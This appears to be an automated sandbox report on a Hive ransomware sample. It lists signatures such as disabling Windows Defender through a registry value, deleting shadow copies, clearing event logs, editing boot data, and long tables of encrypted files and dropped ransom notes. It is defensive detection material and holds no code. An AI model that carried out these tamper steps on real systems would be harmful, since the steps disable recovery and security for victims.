Analysis Overview
SHA256
6c0e759936d63c0dfc6f9ab077817b6de3b251b44e0bde1d966aea3a73ac2c2e
Threat Level: Known bad
The file 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.7z was found to be: Known bad.
Malicious Activity Summary
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
Deletes Windows Defender Definitions
Deletes shadow copies
Clears Windows event logs
Modifies boot configuration data using bcdedit
Modifies extensions of user files
Reads user/profile data of web browsers
Drops file in Program Files directory
Launches sc.exe
Suspicious behavior: EnumeratesProcesses
Opens file in notepad (likely ransom note)
Interacts with shadow copies
Runs ping.exe
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-03-20 00:34
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-03-20 00:34
Reported
2022-03-20 01:05
Platform
win7-20220311-en
Max time kernel
4294371s
Max time network
325s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Users\Admin\Pictures\RevokeFind.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\CheckpointOpen.png.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\CheckpointResume.crw => C:\Users\Admin\Pictures\CheckpointResume.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\CopyUndo.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ReadWatch.raw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\RevokeFind.crw => C:\Users\Admin\Pictures\RevokeFind.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\DisableSplit.crw => C:\Users\Admin\Pictures\DisableSplit.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\DisableSplit.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UndoNew.tif => C:\Users\Admin\Pictures\UndoNew.tif.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\CheckpointOpen.png => C:\Users\Admin\Pictures\CheckpointOpen.png.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\CompareImport.raw => C:\Users\Admin\Pictures\CompareImport.raw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\CompareImport.raw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ConvertFromPing.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ConvertFromSet.raw => C:\Users\Admin\Pictures\ConvertFromSet.raw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ConvertFromPing.crw => C:\Users\Admin\Pictures\ConvertFromPing.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\CopyUndo.crw => C:\Users\Admin\Pictures\CopyUndo.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SearchMove.png => C:\Users\Admin\Pictures\SearchMove.png.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SearchMove.png.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\UndoNew.tif.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\CheckpointResume.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ConvertFromSet.raw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\JoinAdd.raw => C:\Users\Admin\Pictures\JoinAdd.raw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\JoinAdd.raw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ReadWatch.raw => C:\Users\Admin\Pictures\ReadWatch.raw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\VSTO\vstoee100.tlb.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Multiplayer\Spades\es-ES\ShvlRes.dll.mui.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_ja.jar.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-windows.jar.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\js\RSSFeeds.js | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099186.JPG.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\offset.ax | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Costa_Rica.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Knox.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Stanley.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18207_.WMF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\SPANISH.LNG.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File created | C:\Program Files\Microsoft Games\Chess\fr-FR\xG7b_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_ButtonGraphic.png | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0234687.GIF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\STS2\tab_on.gif.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH01065_.WMF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME55.CSS.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_ja.jar.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_divider_right.png | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\js\settings.js | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\it-IT\css\settings.css | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageMaskSmall.bmp.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_spellcheck.gif.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Madrid.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_ja.jar.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKACC.CFG.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\ReadOutLoud.api.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198226.WMF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00523_.WMF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\js\localizedStrings.js | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Clarity.eftx.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\PICCAP98.POC.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-dialogs.jar.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\es-ES\setup_wm.exe.mui | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\gadget.xml | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\Stationery\HandPrints.jpg | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\js\settings.js | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msadcfr.dll.mui | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SLATE\THMBNAIL.PNG.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDCNCL.CFG.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\LoanAmortization.xltx.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\js\settings.js | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\xG7b_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02405_.WMF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02268_.WMF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SPACE_01.MID.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupicons.jpg.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\xG7b_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-core.xml.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\drag.png | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\es-ES\Sidebar.exe.mui | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
